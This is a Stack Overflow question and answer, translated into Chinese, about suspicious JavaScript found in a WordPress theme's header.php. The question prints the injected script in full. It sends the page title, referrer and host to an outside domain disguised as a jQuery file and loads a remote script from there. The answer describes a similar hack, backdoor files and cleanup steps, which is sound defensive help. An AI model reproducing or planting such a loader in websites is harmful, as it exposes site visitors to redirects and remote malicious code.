首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >在wordpress站点的header.php文件中发现未知代码

在wordpress站点的header.php文件中发现未知代码
EN

Stack Overflow用户
提问于 2016-01-09 19:10:02
回答 1查看 619关注 0票数 1

我在主题的header.php文件中发现了下面的代码,我不确定它们都是关于什么的。

代码语言:javascript
复制
<script>
    var a = '';
    setTimeout(10);
    var default_keyword = encodeURIComponent(document.title);
    var se_referrer = encodeURIComponent(document.referrer);
    var host = encodeURIComponent(window.location.host);
    var base = "http://tradenetservice.com/js/jquery.min.php";
    var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
    var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
    if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
        document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
    }
</script>
EN

回答 1

Stack Overflow用户

发布于 2016-01-09 19:58:30

就在一周前,我的wordpress网站被黑客入侵,也被注入了类似的病毒。在我的header.php中添加了代码,仅当用户从手机浏览网站时才将用户重定向到外部网站(广告、色情)。

活动主题中的其他文件也被注入。

我所做的是下载所有的站点文件,并将它们与备份进行比较。通过这种方式,我在主题中找到了注入的代码,还找到了/wp-includes/中的一些文件,这些文件不是常规wordpress安装的一部分,类似于后门。

还要检查站点根目录上的wp-load.php,在我的例子中,我从/wp-includes/中删除的文件被包含/执行,在这个文件中有一个额外的行。

除了清理你的网站代码,你应该做一些关于保护你的wordpress网站免受黑客攻击的搜索,并将找到许多建议的措施,试图防止这种情况再次发生。

票数 1
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/34692712

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档